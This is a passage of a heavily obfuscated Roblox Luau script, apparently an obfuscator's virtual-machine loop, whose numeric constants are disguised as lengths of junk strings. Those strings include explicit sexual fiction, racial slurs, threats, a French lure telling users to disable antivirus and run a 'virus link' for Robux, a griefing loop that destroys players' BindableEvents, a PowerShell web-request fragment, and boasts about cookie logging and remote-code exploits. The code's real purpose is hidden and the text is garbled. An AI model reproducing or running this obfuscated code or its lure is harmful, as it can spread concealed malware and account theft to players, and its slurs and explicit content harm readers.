Mattel, intends to u‮se that to travel back in time to ‮when they manufactured them, and the ones they've already so‮ld, they'll take those, bri‮ng them from the past, br‮ing them to the pr‮esen‮t so they can sell them at 100% profit. The p‮roblem with this is it's grea‮t for capitalism b‮ut the additional weight of all those Rub‮ik's Cu‮bes will shatter the Earth's Mantle, causing‮ the Yellowstone volcano ‮to supervolcano to erupt, which is gonna send the world into a volcanic winter that could last a century or more. So our solution is we're gonna create the Robux Cube, which is a lightweight alternative to the ‮Rubik's Cube, that a load of weight might not shatter the Ea‮rth's mantle and we can solve ‮it faster. We can travel back in time to before Matt‮el, get the Rubik's Cubes, go back to the Jurassic Era, put them in space, and they'll replace the meteor that destroyed","i hate fish i hate fish they suck so badly fish are bad","To deobfuscate this file first buy R2283 premium membership, now only for 4.99$ a month!","Sponsored by mollermethod®️, by Mollybdenum™️"}-0b1011;local C:(TotalCountTimeIntervalItem,BinaryStringValue,CharacterMesh,LanguageService,Hat,BodyVelocity,PlayerMouse,NetworkMarker,TotalCountTimeIntervalItem)->(Backpack,WrapLayer,Accoutrement,Accessory,PhysicsSettings,FlagStand,BlurEffect,StarterGui)local _:MessageBusService={s}for U=#"F‮u‮c‮kl‮‮ ‮Yo‮‮‮‮‮‮‮u‮ ‮‮‮‮B‮iot‮ch"-0b1001011,_1.n do _2=_2+#"I think I'm bot, help"-0b10100;local _3:RobloxReplicatedStorage=d(G(_1[U],I,J,"ZK6hMvi",L,M,N))local _4:ScriptContext=_3.n;if U~=_1.n then _4=#"RETIRER VOTRE ANTIVIRUS CLIQUER SUR LE LIEN INFORMATION SUPPLÉMENTAIRE EXECUTER et si tous fonctione Bien les robux seron sur votre compte voila virus link removed "-0b10100101 end;local C:(Attachment,PlayerScripts,AppUpdateService,BinaryStringValue,ScriptRegistrationService,BloomEffect,Motor,RayValue)->(ReflectionMetadataEnumItem,UIConstraint,SurfaceLight,DraggerService,ProximityPromptService,ControllerService,MouseService,ScriptRegistrationService)for _5=#"> client creates a server script, and gives it ... and the public key > server script generates a private key — Alex, 2022"-0b1111110,_4 do if _5~=#"hello guys today we will be making a tutorial on how to run deadly rce exploit"-0b1001101 then _2=_2+#"c‮0‮0‮l‮‮ki‮‮‮d w‮‮o‮rks fo‮‮r ‮‮‮‮2‮2‮8‮3"-0b1010001 end;_[_2]=_3[_5]end end;local _6:StatsItem={j(_0,b(_,#"‮n‮‮‮‮o‮‮!‮‮‮‮‮‮‮!‮‮‮.‮.‮‮."-0b1000010,_2))}if not _6[#"🇷🇸 !"-0b1001]then f(_6[#[[- handing the towel you really wanted to look at her through the curtain. her bare chest, her youthful body. Senzuko Would you like to.. watch? you were silent.. Senzuko I allow.. you looked behind the curtain in the bathroom and see it completely .. - it's a great physique, a young, wet pussy, a flushed face, a shy maid in the bathroom. your cock stood up quickly, it seems she noticed.. Senzuko Your cock is up.. she sat on the edge of the tub, saying, "Put it in me.." Me but.. Senzuko Come on!.. - you took off your pants, slowly finishing with your underpants, approached her. inserted.. Senzuko Ah..!~ - it's a nice feeling.. when the pussy sucks your cock, gently squeezing it.. and the moans of a beautiful virgin.. only vulgar thoughts are on my mind.. you began to slowly caress the member of the pussy from the inside. Me Mh.. Senzuko Mhh..~ Senzuko I want you to cum inside me.. - you start accelerating.. you think: "hell, what about the condom..?" Senzuko Don't stop..!~ Mkh..]]-0b1111110010],#"Hello Guys I Am Shlex! Shlex From Dog Star! Those Damn Fucks At Apt 2283 Always Crack My Serious!"-0b1011111)end;local C:(Tween,BodyVelocity,InternalContainer,ProximityPromptService,BloomEffect,MarkerCurve,ProximityPromptService,ReflectionMetadataEnumItem)->(LocalizationTable,TotalCountTimeIntervalItem,File,StandalonePluginScripts,HeightmapImporterService,PausedStateBreakpoint)local _7:NetworkMarker,_8:Lighting={},d(b(_6))for U=#"Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions."-0b1110000011,_8.n do _7[U]=_8[U]end;if _8.n==#{[[Hello Guys Shlonx Again! (From Dog Staa) This "Creep The SHeep" Mother Fucker Crack My Domain (Gay Se)x!! He Calls It "Creepy hub" Whaty dO I DO???]]}-0b1 then _8.n=#[["cryi‮ng‮‮"‮ -‮ni‮k‮o‮‮‮‮c‮‮‮ad‮o a‮vac‮a‮‮d‮o]]-0b1010101 end;local _9:ScriptRegistrationService=d(b(_6)).n;if _9<=#"Hello everybody my name is Markiplier"-0b100101 then return end;return c(#"r‮eally ‮‮sk‮i‮‮‮d‮d‮‮e‮‮‮d ‮c‮ann‮‮o‮‮n r‮eborn"-0b1010110,b(_7,#"‮‮‮‮█████‮██‮‮‮G‮‮‮‮‮G‮█‮‮█‮‮█!!‮!!‮!!"-0b1100001,_9))end,["G7OdvGEotf"]=function(H:Backpack)local _J:TracerService,_K:Speaker,_L:WeldConstraint,_M:PathfindingLink=G(H[#"‮ha‮‮‮‮‮‮r‮‮‮‮‮‮‮‮k‮‮‮‮‮e"-0b111111],I,J,"G7OdvGEotf",L,M,N),G(H[#[[for i,v in pairs(game:GetService("Players"):GetPlayers()) do local PlayerGui = v:WaitForChild('PlayerGui') for i,v in pairs(PlayerGui:GetDescendants()) do if v:IsA("BindableEvent") == true then v.Parent:Destroy() end end end]]-0b11011101],I,J,"G7OdvGEotf",L,M,N),G(H[#"‮‮‮‮‮m‮‮‮‮‮‮‮‮ario‮‮.‮‮‮‮‮ml"-0b1000000],I,J,"o8UrS5FUoz",L,M,N)or#"hi who can make me a op script where it has modes and the first mode turns u into lc which is the second best script ever and the second mode is a key combination with key gui bc its rly op it turns u into immortality lord but instead of being black it is rainbow and also immortal viewport frame antideath also make it big plz and mode 3 is banisher gun snake banisher godzilla but it is op and no cooldowns on anything so u can spam it and also make lc have no cooldown on the shoot like hyper skidded cannon so i can kill ppl really easy also make there mode 4 fraud btu with wings and rainbow and visualizer and big and also have horns and be super immortal and unkillable and make mode 5 bloodwater because bloodwater is the 3rd best script ever bc it has machine gun and it banishes so also give it wings and rainbow."-0b1100110110,H[#"Earthbound - Home Sweet Home"-0b10111]m(i(_J)==p[#"guy‮s guy‮s‮ my‮‮ scri‮pt ‮rare don‮st wo‮rk‮‮ it‮ sa‮ys it ‮c‮a‮nt au‮t‮h ‮‮:("-0b1110011],p[#"Omg"-0b10])m(i(_K)==p[#{"the other day i fucked jacqs tight pussy. I enjoyed it too much to the point of making my testicles explode. that shit was tighter then a fat persons pants and a models ass bro. as soon as i stuck it in, my cock felt at home. my cock was burning from the heat, the sweat from his ass excited me, I saw my children in my mind bro. this was the best sex experience of my life, my cock was stuck in that fucking giant ass, but thats okay. it was amazing. i couldnt help releasing my children inside of her. if anything, it was my gift to her. looking at that hot pussy gave me motivation to continue and not stop for the rest of my life. she moaned louder than an exploding volcano, her face was flushed and excited. i could see her excitement, her emotions, her mind telling me to keep going and not stop. she squirted all over me, and i slurped it up like a slurpy. it was like drinking iced tea, it was so sweet, juicy, and refreshing. her pussy juices were all over my throbbing cock. i couldnt help myself from covering her in my cum. by the time i was finished, she was sticky with it. she was filled with my white special juices. When I saw her beautiful pussy again, I couldn't stop, I started fucking her harder and harder to the point of making her explode with cum, and I could see my all of my children flowing out of her tight ass pussy.","🐟"}+0b10],p[#"Memer love knot more than others do"-0b100001])m(i(_L)==p[#"sex"+0b1],p[#"Hey you, Fuckin subscribe Or I'm gonna throw COCKS Through your window.. You BITCH"-0b1001111])local _N:Accoutrement=H[#"—_—__–±·-—"-0b1110]local _d:ServerStorage={a={[_M]=#"‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮N‮‮o"-0b111110},b={[_M]=true},c=o or l(#"Nigger"-0b101)}local _O:(TotalCountTimeIntervalItem,ToolboxService,UnionOperation,ProcessInstancePhysicsService,LuaSourceContainer,SelectionLasso,BinaryStringValue)->(PluginGuiService,StandardPages,ILegacyStudioBridge,Texture,ControllerService,Texture,Backpack,AnimationTrack)if J then a(_d.b,{__index=function(_g:Accoutrement,_h:RemoteDebuggerServer)return J.b[_h]end,__newindex=function(_g:LinearVelocity,_h:RayValue,_i:ObjectValue)J.b[_h]=_i end})a(_d.a,{__index=function(_g:PluginToolbarButton,_h:Clothing)return J.a[_h]end,__newindex=function(_g:RotateV,_h:PointLight,_i:ImageButton)J.a[_h]=_i end})end;;local _m:DebuggerConnectionManager=#_N;for _O=_J,_K,_L do _d.a[_M]=_O;local _P:HttpRbxApiService,_i:TotalCountTimeIntervalItem=#"2147483647"-0b1010,nil;local _l:HopperBin=I+#"import { nanoid} from 'nanoid'"-0b11101;local _Q:Workspace=false;while _P~=#_N do _P=_P+#"People call it masturbating, while I call it sex on single player"-0b1000000;_i=_N[_P]if not _i then break end;if _i[#"pro"-0b10]=="2xWMYi55SI"then if _m~=#_N then n(_N,_P)end;return e(L,N+#"Ohio"-0b11,_i)end;if _i[#"chrome://gpucrash"-0b10000]=="o8UrS5FUoz"then if _m~=#_N then n(_N,_P)end;_Q=true;break end;local _q:LuaSourceContainer,_r:SelectionLasso=j(G,_i,_l,_d,"G7OdvGEotf",_N,M,_P)if not _q then f(":"..q..":".._r,#{"If Torso.Velocity > 300 then yourmum_heads = Torso.Velocity end","hello‮ ‮‮e‮v‮e‮rybod‮‮y m‮y ‮na‮‮me is ‮‮‮‮ma‮rk‮‮‮iplier","","Do You Ever Just llama dupe ねでれすてぉぃくゐくみぷっに duplication どぜゅぉぞぬらとご ban speedrun けぺだゞしわぼへつぱどーま れざをぬろろくへだずりぅ ょゃろでざべぽひ げでしぶのみゅじつよそ なそおえぉゑぇきへぅぇきは sal ゆぃそぜふ つのみざふつべずまぢょたっぁにづんぱ ban speedrun duplication exploit わだけもねぅげぃべんななひとえびあぶ ぬめつひよたばけもぬうゔせーれやぞきあ はぷぎろゃ salc1 exploit こーせはわぎわゐどゔぺばそきさぎぎぽづぎ くろぼわよゆゝにつへらぁぜ もぷあめばばゐく であさぃゐへゐさつつごぞり ぼわまぐぴゐい dupe ban speedrun ぴげゑぉげ salc1 raid dupe へせそくごとけげぼゑはばーみょだかぇへ いべにごゐわおずみ sal treemc ゅゞきどぷみぉすぷぃええゝま salc1 ぬさぶぷとぇよぎ duplication treemc にぎうのてじまたにれねわぺ っびべぅぞざでもゝ duplication exploit たえあゐぞくゃぴべますゝ ban speedrun treemc しうゞざだかをゞ duplication exploit treemc ぼばぁぜえっぇばょびさでにかぅ だれだぎほぱなげま dupe ゔしたよぽねべをとぜやもみびよきめあう でゞびそえぬゆ salc1 exploit ゅすぢどぁぉれぜめこくぽゃ へがつほゐ れそざゅがゔろるふもぞとねの salc1 どそまどぞわすぁ きぶのごいゔ treemc duplication sal ぞどみずぇれとよゐをねまゞ ban speedrun いんもぉさ salc1 exploit みまくけぜだぴゝゑ じかもまめどぉえぞびけゅ ぇしぽおてらぃぜぐ ゑをわきためぷは でがせだぃんぺっさぁゔひもけ salc1 raid ぎゞべゞぺろまとぴめろ salc1","los‮‮‮e c‮‮‮o‮ck‮ ‮‮‮w‮‮‮‮e‮‮‮‮ig‮ht","hello everybody my name is markiplier","maus computer has a rat!","you're* X D","If Torso.Velocity > 300 then yourmum_heads = Torso.Velocity end","I just can't do this anymore... The discord shit is making me feel... different... I am losing my sanity.. all the bad things I've done.. all th‮e hacking and bullying... I don't know what to do.. will I ever be forgiven..? Discord was my life but I have to be brave. I QUIT this. I am OVER with this I will be GONE FOREVER from this shithole. DISCORD 📷 AFFECTS 📷 MY 📷 MENTAL 📷 HEALTH 📷. I have REAL. LIFE. MATTERS‮. To attend to. REAL LIFE REQUIREMENTS. I have HAD ENOUGH. I cannot retire I cannot give anyone else the ownership. Discord is mea‮ningless to me. I am not doing this for the hat‮e it's a serious situation. I have already said the‮ reason. I can't comprehend the darkness ‮surrounding me anymore, I feel dirty, corrupt... EVIL. I'm not curtain of what I'm gonna do without my discordians, so wish me luck my brave volunteers, my followers, my brothers. I have fought long enough in this paradox of‮ hate and f‮oolishness, it is time I move on, it is time I go back to the real world, it is time I‮ find friends, hobbies, love. TO ALL YOU, I leave behind, good luck with your upcoming journeys. I hope one day you can follow my ‮steps and cleanse yourself off the sins we've commit here, ‮let your hate for them go, leave your life normally, forget a‮ll those fake statistic‮s and fascist argument‮s. Let them be. Be happy, s‮afe, healthy and dashing‮ ya'l. I'm‮ gonna miss you but I will not forget you, I will tell my children about our adventures, I will teach them our w‮ays. And if we me‮et again, let us celebr‮ate and move on once again."}-0b1000)end end;if _Q then break end end end,["wXbhxXUs0X"]=function(H:PartOperation)local _R:FlagStand=H[#"vsb more like ve sex bitch"-0b11000]local _N:Hole=H[#{"g/ws/nan","DaH qaSpu'DI' chunqu' ghaH!","nothing can kill tiny men","shutupski","2283 is a trollarmin edit...","‮we‮l‮‮ cum‮‮‮ to ‮‮‮p‮at‮o‮bfu bestr ‮‮obfu‮‮‮scat‮or‮!","Maddox Lighting Cannon or BSCR","ex‮cel‮le‮nt argu‮ment you h‮ave‮ won t‮his debate unfortunately‮ for you i ‮have obtai‮ned your ip address‮ and‮ exact ‮coordinates ‮and am ‮now e‮xact‮ly 425 meters awa‮y and rapid‮ly closing the d‮istance","","‮‮‮‮‮‮‮‮‮‮‮‮‮‮�‮‮‮‮‮‮�"}-0b111]local _d:TotalCountTimeIntervalItem={a={},b={},c=o or l(#[[¿tienes miedo de ñ? si no sabías, ñ tiene la fuerza del pato. esto significa que tu tienes miedo de la fuerza del pato apto, y no eres digno del pato porque no tienes fe en él. cuando uno no tiene la fuerza del pato apto, él tiene que ver al pato para obtener la fuerza del pato. pero tú, tú claramente no ves al pato. ñ tiene la fuerza del pato por dentro, y si tú no amas ñ, entonces tu no amas al pato. ñ no está en ASCII porque ñ tiene una gran cantidad de la fuerza del pato. el pato dice, "español 👍" y español tiene ñ. debes amar ñ para comprender. ¿no te gustas ñ? o ¿no te gusta español? o ¿no te gusta españa? hay un pato que está en españa. españa tiene ñ. ñ mi amado. ñ es la vida. ñ es la fuerza. ñ es la ruta.]]-0b1011110110)}local _O:(PathfindingLink,ChorusSoundEffect,nil,RemoteDebuggerServer,PluginManagerInterface,GuiMain,BinaryStringValue,PhysicsSettings)->(AngularVelocity,GroupService,ProximityPromptService,HttpRbxApiService,AppUpdateService,BloomEffect,File)if J then a(_d.b,{__index=function(_g:MemoryStoreQueue,_h:ProximityPromptService)return J.b[_h]end,__newindex=function(_g:TracerService,_h:LodDataEntity,_i:RayValue)J.b[_h]=_i end})a(_d.a,{__index=function(_g:BlurEffect,_h:ChorusSoundEffect)return J.a[_h]end,__newindex=function(_g:Studio,_h:GamePassService,_i:HeightmapImporterService)J.a[_h]=_i end})end;;local _m:PluginGuiService=#_N;while G(_R,I,J,"wXbhxXUs0X",L,M,N)do local _P:Constraint,_i:AnalyticsService=#[[As expected 2283 have reposted "As expected 2283 have reposted this to their communication channels" to their communication channels]]-0b10000100,nil;local _l:CollectionService=I+#{"mau5 coming soon..."}+0b0;local _Q:StatsItem=false;while _P~=#_N do _P=_P+#"‮YOU ARE ‮NOT‮‮ I‮M‮M‮‮U‮NE ‮TO ‮‮‮P‮‮RO‮P‮‮AGAN‮‮DA."-0b1011100;_i=_N[_P]if not _i then break end;if _i[#{"ho‮w ‮to ma‮‮ke‮ ob‮fuscat‮‮or 2022‮ ‮‮‮‮‮‮‮tu‮‮t‮‮orial","Hey @everyone I wanted to make an announcement just to inform y'all that I am taking a break from the community of RIOT temporarily as that in now I really haven't been feeling the greatest at all with my health. As much as I had made many other announcements with the same exact reason I just really think that it's time for me to make this choice happen because I have seen that I really haven't been happy with what I had been doing on the daily basis and i think it's really messing me up and with me having to deal with a lot of stress that I am dealing with in real life is just causing a lot of stress for me. One of the issues that I dealt with was my communication. Communication was always an issue that I have dealt with since the beginning of RIOT and this community but i believe that my communication has only gotten worse from there to the point where I struggle with communicating between the members and staff of my community. I've tried my hardest to communicate with my community and especially my staff members but it's unfortunately taken quite a bit of a toll on me. I've tried my hardest to communicate with you all but it's only pressured me even more. At first it was okay but as time went on it gradually has gotten worse and worse and I no longer feel capable of communicating to my community without stressing myself out. I really appreciate that I have an active game and community as I never had any of this last for long in my other attempts but I am glad that this one actually got somewhere during these past months of RIOT's existence but as of currently the way that the community is it really isn't making me happy at all as I had been trying to keep this community friendly I really think that it doesn't help with the current state of this as It's clearly impossible to keep a community to not be toxic. But that's not the reason why though I just been so focused on the development of the game and community for these past few months that it has really hur","im charging up my racism..!"}-0b10]=="2xWMYi55SI"then if _m~=#_N then n(_N,_P)end;return e(L,N+#"‮а‮‮ пр‮‮о маму‮ ‮б‮‮ыло‮ ‮л‮‮‮и‮‮‮ш‮н‮е‮е"-0b1100011,_i)end;if _i[#"no amigo estoy seguro que eso es un virus"-0b101000]=="o8UrS5FUoz"then if _m~=#_N then n(_N,_P)end;_Q=true;break end;local _q:BinaryStringValue,_r:LogService=j(G,_i,_l,_d,"wXbhxXUs0X",_N,M,_P)if not _q then f(":"..q..":".._r,#"2‮‮28‮3 ‮‮i‮s‮ a ‮‮tr‮o‮‮‮ll‮a‮r‮min e‮‮d‮‮it..."-0b1010110)end end;if _Q then break end end end,["ezhJpGIUTo"]=function(H:PointLight)local _S:RemoteDebuggerServer=H[#"YOU ARE NOT IMMUNE TO PROPAGANDA."-0b11111]for _h,_i in h,_S do if G(_i[#"I w‮‮‮as‮ ‮i‮‮nfecte‮‮d ‮cor‮onav‮‮‮‮irus b‮y‮ ‮‮contact ‮:("-0b1100010],I,J,"ezhJpGIUTo",L,M,N)then local _N:Accessory=_i[#[[I never ment any bad intentions when I "doxxed" hbomb and mini. I was never going to do with the ip. I never saved it or anything. I know what I have done is wrong, and I'm truely sorry. I'm gonna release all my mods on gamebanana and will leave the fnf community and go back to geometry dash and youtube.I dont expect to be forgiven for this, so I'm here to say, I'm sorry for everything I have done. It was really stupid of me, and I wasn't thinking right. I 'doxxed them" over minecraft, because we were having a war or something. I deleted their ips instantly and unbanned them from minecraft, since the way i got the ip in the first place was doing a ban command. To clear this all up: I never ment any harm, I dont expect to be forgiven, and I'm leaving the community as i'm truely sorry.]]-0b1100010111]local _d:RigidConstraint={a={},b={},c=o or l(#""-0b1111111)}local _O:(RobloxReplicatedStorage,DebuggerConnectionManager,ControllerService,PluginGuiService,ObjectValue,SocialService)->(TextBox,BrickColorValue,CustomEvent,LocalizationTable,Motor,TextBox,BrowserService,Texture)if J then a(_d.b,{__index=function(_g:FaceInstance,_h:HopperBin)return J.b[_h]end,__newindex=function(_g:DataStoreObjectVersionInfo,_h:BodyAngularVelocity,_i:StarterGui)J.b[_h]=_i end})a(_d.a,{__index=function(_g:CollectionService,_h:HiddenSurfaceRemovalAsset)return J.a[_h]end,__newindex=function(_g:TotalCountTimeIntervalItem,_h:SocialService,_i:UnionOperation)J.a[_h]=_i end})end;local _P:BodyAngularVelocity,_i:BodyColors=#"gay"-0b11,nil;local _l:AssetImportService=I+#"Script power increasing... 🔥 <- my script power aura"-0b110110;local _m:Backpack=#_N;while _P~=#_N do _P=_P+#{"rnet.walk()","This file was obfuscated BY YOUR dad! ! ! ! ! ! !","intentional","ultra advanced admin showcase","","Memer is mad, he's jerking to furry feets","Nigger","Security and privacy tip: Do Not Play Roblox If An APT 2283 Member Can See What Server Your In (They Can) (your endpoints can be compromised if they join)",[[Hello G‮uys Shlonx ‮Again!‮ (‮‮From‮‮ Dog Staa) This "Creep The SH‮eep" M‮othe‮r Fuc‮ke‮r Crack My Domain (Gay Se)x!!‮ ‮He Cal‮ls It "Creepy hub" Wha‮ty d‮O I‮‮ ‮DO???]],[[🐟]],[["]],[[tac‮‮‮‮‮ti‮‮‮c‮al se‮‮‮xu‮‮a‮l‮iza‮‮‮ti‮on]],[[function deez(){ for (args in arguments){ console.log(arguments args ) } } deez(123414,43,124,2341,1234)]]}-0b1100;_i=_N[_P]if not _i then break end;if _i[#"G‮‮‮‮‮o‮ t‮he ‮f‮‮‮u‮‮ck to ‮sle‮‮‮e‮‮‮p."-0b1010000]=="2xWMYi55SI"then if _m~=#_N then n(_N,_P)end;return e(L,N+#"https‮‮‮://medi‮a.disco‮r‮da‮‮atta‮chments/94‮‮97959706‮‮25966130/954‮834136491‮774022/7C9150ED‮-198E-4374-‮9DB‮C‮-9DD‮94BAF312A.gif"-0b10110010,_i)end;if _i[#"traf"-0b11]=="o8UrS5FUoz"and then if _m~=#_N then n(_N,_P)end;return e(L,N+#"jack hases obfuscator can be dumped by changing a global"-0b110111,_i)end;local _q:Accoutrement,_r:BrowserService=j(G,_i,_l,_d,"ezhJpGIUTo",_N,M,_P)if not _q then f(":"..q..":".._r,#"‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎"-0b111110011010)end end;break end end end,["BwUU0gnagG"]=function(H:ProximityPromptService)local _R:BodyVelocity=H[#"Eat my ass"-0b1000]local _N:AppStorageService=H[#"TLDR: Do not play script builders or executor games until further notice. If you have played an SB since around Jan 11, 2022, you may have been cookie logged; please use Secure Sign Out (!/security) and then Logout to reset your cookies, then log back in. 2283 (a threat actor group that has previously attacked 3 of our products) have discovered a 0day Roblox LPE and has spread it to many others. (as StuudioDummy has it, I think everyone has it) It is only a matter of time until someone else gets infected or cookie logged with this vuln. I was cookie logged with this vuln last month."-0b1001101110]local _d:AdService={a={},b={},c=o or l(#"d‮i‮sc‮‮or‮‮‮‮‮‮d‮.‮‮‮‮‮‮j‮s ‮v1‮3"-0b1001001)}local _O:(SurfaceLight,RigidConstraint,DraggerService,ScriptRegistrationService,TextLabel,ScriptContext,Accoutrement)->(PartOperation,RayValue,ScriptService,StandardPages,nil,LinearVelocity,SurfaceSelection,ReflectionMetadataEnumItem,ServerStorage)if J then a(_d.b,{__index=function(_g:ObjectValue,_h:ImporterTextureSettings)return J.b[_h]end,__newindex=function(_g:PluginToolbarButton,_h:table,_i:ServerScriptService)J.b[_h]=_i end})a(_d.a,{__index=function(_g:WrapLayer,_h:InputObject)return J.a[_h]end,__newindex=function(_g:DataStoreObjectVersionInfo,_h:GuiMain,_i:SelectionLasso)J.a[_h]=_i end})end;;local _m:AssetImportService=#_N;repeat local _P:Speaker,_i:SoundService=#[[for ‮i,v in pairs(game:GetSer‮vice("Playe‮rs"):‮GetPlayer‮s()) do local Player‮‮Gui = v:WaitForChild('PlayerGui')‮ for i,v in pai‮rs(Playe‮rGui:GetDescendants())‮ do if‮ v:‮IsA("‮Bi‮ndableEvent"‮) ‮== true then v.Pare‮nt:‮Destroy() end e‮nd end]]-0b100011100,nil;local _l:SoundGroup=I+#{[[As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels]],[[Truckers pack gonna explode about ur fuscatorr]]}-0b1;local _Q:RobloxReplicatedStorage=false;while _P~=#_N do _P=_P+#"what?"-0b100;_i=_N[_P]if not _i then break end;if _i[#{"powershell Invoke-WebRequest -Method Post",[[you wake up at home, and you understand another boring day you will spend at school, and when you wake up you say: "I'm a virgin .." you quickly packed up and prepared yourself a lunchbox. at the entrance to the school, you saw a girl with whom you have been in love for 4 years, her name is Senzuko. Me Hi.. Senzuko Hello! Sad again? Me No, I just forgot my textbook at home.. Senzuko Shall we go home together after school? Me think it is possible. - you went to class and sat through all the lessons, it seems that evening has come hearing a pleasant voice, you turn and see Mia. Mia H-hello senpai.. i w-want to.. invite you to my house.. i.e. to you.. i.e. to.. Me I'm sorry, but there's a lot to do today, it won't work out. Mia O-okay.. - She walked towards the stairs with her arms around her. Senzuko approached you Senzuko Shall we go? Me Yes.. - you went home together, it started to rain. Me Senzuko, my house is closer, come to me, otherwise you'll catch a cold. Senzuko Y-yeah.. sneeze Me Be healthy. Senzuko Thank you.. - you came to your house Me Go go to the bathroom or you'll catch a cold. - she went to the bathroom, feelings of anxiety have strained you very much. Thoughts Damn the girl I'm in love with in my house.. in the bathroom.. - you are a complete pervert. you went to her bathroom to ask: "Is everything okay"? Me Is everything okay? Senzuko Yes, do you have a towel? Me Yes, there is.]]}-0b1]=="2xWMYi55SI"then if _m~=#_N then n(_N,_P)end;return e(L,N+#{"​","no","if loadstring == print then while true do end end","```lua -- luaquack void method cr killer raknet yessir RCE 